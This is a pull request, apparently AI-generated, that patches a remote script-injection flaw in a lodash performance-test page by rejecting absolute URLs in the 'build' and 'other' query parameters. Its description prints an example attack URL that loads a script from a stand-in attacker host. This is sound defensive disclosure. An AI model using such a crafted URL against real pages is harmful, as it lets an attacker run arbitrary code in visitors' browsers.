### PR TITLE
fix(perf): prevent external script loading via URL query parameters

### DIFF
--- a/perf/asset/perf-ui.js
+++ b/perf/asset/perf-ui.js
@@ -81,13 +81,23 @@
     otherList.addEventListener('change', eventHandler);
   });
 
+  /** Matches absolute URLs (http://, https://, // and other schemes) that must not
+   *  be used as script src values to prevent remote script injection. */
+  var reAbsoluteUrl = /^(?:[a-z][a-z\d+\-.]*:|\/\/)/i;
+
   // The lodash build file path.
   ui.buildPath = (function() {
     var result;
     switch (build) {
       case null:                build  = 'lodash';
       case 'lodash':            result = 'dist/lodash.min.js'; break;
-      default:                  return build;
+      default:
+        if (reAbsoluteUrl.test(build)) {
+          build = 'lodash';
+          result = 'dist/lodash.min.js';
+          break;
+        }
+        return build;
     }
     return basePath + result;
   }());
@@ -100,7 +110,13 @@
       case 'underscore-dev':    result = 'vendor/underscore/underscore.js'; break;
       case null:                other  = 'underscore';
       case 'underscore':        result = 'vendor/underscore/underscore-min.js'; break;
-      default:                  return other;
+      default:
+        if (reAbsoluteUrl.test(other)) {
+          other = 'underscore';
+          result = 'vendor/underscore/underscore-min.js';
+          break;
+        }
+        return other;
     }
     return basePath + result;
   }());


### PR DESCRIPTION
## Summary

`perf/asset/perf-ui.js` reads `build` and `other` from the URL query string and passes them directly as `<script src>` values through `document.write` when they don't match a known entry. This allows loading arbitrary external scripts by opening a crafted URL:

```
perf/index.html?build=https://attacker.example/evil.js
```

## Fix

Added `reAbsoluteUrl = /^(?:[a-z][a-z\d+\-.]*:|\/\/)/i` and a guard in the `default:` branch of both `ui.buildPath` and `ui.otherPath`. Any absolute URL is rejected and replaced by the safe default. Relative paths for custom local builds continue to work as before.

## Test plan

- [ ] `?build=https://example.com/evil.js` — falls back to default lodash build; external script is not loaded
- [ ] `?other=https://example.com/evil.js` — same fallback behaviour
- [ ] `?build=dist/lodash.js` (relative path) — loads correctly as before

🤖 Generated with [Claude Code](https://claude.com/claude-code)